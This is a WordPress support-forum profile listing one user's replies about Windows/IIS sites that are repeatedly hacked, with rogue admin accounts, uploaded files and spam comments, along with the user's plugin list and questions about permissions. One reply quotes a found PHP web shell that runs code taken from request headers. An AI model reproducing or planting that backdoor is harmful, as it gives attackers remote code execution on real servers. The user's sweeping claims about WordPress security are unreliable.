salescart
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPressI already have comments deactivated in settings. The hackers were still adding comments. That’s why the people who originated the plugin originally created it because that feature as well is routinely hacked on WordPress. Like I said I have been doing this for awhile and WordPress is the most hacked piece of software ever created. In fact, at my other job, the security team doesn’t allow WordPress anyone in the agency. With the plugin the comment hacking stopped.
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress@asadullah96 How are they doing that?
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPressI have taken a copy of the parent theme,. SKT IT Consultant and created a child theme. Only the smallest of changes to the style sheet to make it look differently.
I use code snippets to:Completely Disable Comments Everywhere. Because that seems to be another hack in WordPress. Even when you have no “forum” in your website, people can somehow still make comments.
Modify the header to add LivePerson support.Forum: Fixing WordPress
In reply to: Admin users created at will with WordPressI have been hosting websites longer than wordpress has existed or that the wordpress domain has been registered. I started with FrontPage websites which were never hacked.
I’ve got like 4 WordPress websites on my servers. They are all hacked at will and have been since inception from Day 1 relentlessly through a generation of mySQL, PHP and Microsoft servers, and from virtually no plugins to 5 or 6 plugins. From tight permissions where you can’t even install a plugin or an update to recommended permissions. https://brudtkuhl.com/blog/wordpress-iis-permissions-updates-permalinks/ Mind you nothing else and no other websites have ever been hacked except when someone’s username was compromised or something obvious.
It doesn’t matter what I do. These are the current plugins:Ninja Forms
Ninja Forms is a webform builder with unparalleled ease of use and features.
Version 3.10.1 | By Saturday Drive | View details
Simple Custom CSS
Add CSS | Deactivate
The simple, solid way to add custom CSS to your WordPress website. Simple Custom CSS allows you to add your own styles or override the default CSS of a plugin or theme.
Version 4.0.7 | By John Regan | View details
Simple Disable XML-RPC
Deactivate | Settings
Simple Disable XML-RPC is a user-friendly WordPress plugin that empowers website administrators to easily control and secure their site by enabling or disabling the XML-RPC functionality. With a simple toggle switch, this plugin helps protect your WordPress site from potential XML-RPC-related security threats, enhancing your website's overall safety and performance.
Version 1.3.5 | By WordPress Satkhira Community | View details
Wordfence Security
Upgrade To Premium(opens in new tab) | Deactivate
Wordfence Security - Anti-virus, Firewall and Malware Scan
Version 8.0.5 | By Wordfence | View details
WP Sitemap Page
Add a sitemap on any page/post using the simple shortcode [wp_sitemap_page]
Version 1.9.5 | By Tony Archambeau | View details | Settings | Donate
Select WPCode Lite
Easily add code snippets in WordPress. Insert scripts to the header and footer, add PHP code snippets with conditional logic, insert ads pixel, custom content, and more.
Version 2.2.7 | By WPCode | View detailsForum: Fixing WordPress
In reply to: Admin users created at will with WordPressI have been restoring from a clean backup EVERY time. The same backup from 2018. I have all the original content including the database backups from 2018. The site starts out clean but it is only a matter of time before it is hacked again. WordPress is very easy to hack. Not only did I start with a backup from 2018, but I deleted all of the wordpress and started with the latest version of wordpress. Then I added WordFence and have run multiple scans including comprehensive scans where it compares files and replaces them. The Wordfence scan is clean. It fact, it is what notified me that someone simply added an admin account. This is all new install of mySQL as well with all updated root username and password. They still walk right into this software like it is hackware.
- This reply was modified 10 months, 2 weeks ago by salescart.
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPressI’m running the wordfence plug-in which verifies everything is cleaned up and repairs all files. I also deleted all of the WordPress extra folders and had them all reinstalled.
Forum: Fixing WordPress
In reply to: IIS Permissions that will result in no hacksThanks James. This isn’t answering my question. My question is what are the correct IIS permissions for WordPress?
Forum: Fixing WordPress
In reply to: Hacked over and over againThis is what I am seeing.
Someone has found a way to upload files which is the most bizarre thing….how can they do that?
The files have numbers and the contents have PHP content:
<?php @eval($_HEADERS[“Sec-Websocket-Accept”]);@eval($_REQUEST[“Sec-Websocket-Accept”]);
Also, they have changed the WP-Settings.php file…what mechanism allows them to do this?
Also, they have uploaded a wp-blog-header.php file which I don’t even believe was originally there. How do I permanently turn off all the blog capabilities. I thought I did already.
They are literally adding their own plugins:
0qn17s61I had wordfence installed but they blew that like it was a paper fence.
Forum: Fixing WordPress
In reply to: Hacked over and over againAll of these permissions with CHMOD describe Unix servers. I’m on a windows server and IIS works completely different with an IUSR account. I set all the permissions correctly towards that.
Also, I have tried multiple security plugins and none of them have worked for me. The rest of the regular websites never have any issues only the wordpress websites…these should be read only. There must be advanced features like API-access or other things on. How do I completely turn off the WP-admin control panel completely ?Forum: Fixing WordPress
In reply to: Sites just keep getting hackedWordfence can scan every file for every extension and fix it…..and I’ve done that including adding a new vanilla update to WordPress and shutting permissions down and it made no difference. Hacked again.
Forum: Fixing WordPress
In reply to: Sites just keep getting hackedOk, that is helpful. Basically I want to restore the website, turn publishing off and make the website “read-only”.
Forum: Fixing WordPress
In reply to: WordPress Backdoor ProtectionIt is a BitNinja report (https://bitninja.com/) from my ISP flagging my IP that has the wordpress website on. I deleted and restored but someone seems to go back and re-hack it each time.
What is WordFence? Looking at it now.
Thanks for your reply.
- This reply was modified 3 years ago by salescart.
Forum: Fixing WordPress
In reply to: Virus attack being uploaded via WordPressEset NOD32 is the anti-virus.
If you have a recommendation for a windows server, let me know.All of the web sites are completely different. WordPress 5.9. PHP 5.6.
Forum: Fixing WordPress
In reply to: Virus attack being uploaded via WordPressIt is happening on multiple websites. The virus scanner is making them as viruses. The basically are files like .13141915 when no first part of the file name. I haven’t opened the files because they are flagged by the virusscanner. They are everywhere but mainly on the root of the folder and the content/uploads folders.
How do I completely disable ALL UPLOADS and ALL discussion posting. I don’t even have any discussion forums going on yet I got to the Admin and people are posting spam discussions to a page that doesn’t even have a discussion on it.
This software is not very safe at all from exploits.
Forum: Fixing WordPress
In reply to: Why are error message paths “cut off”?Ok, got this one solved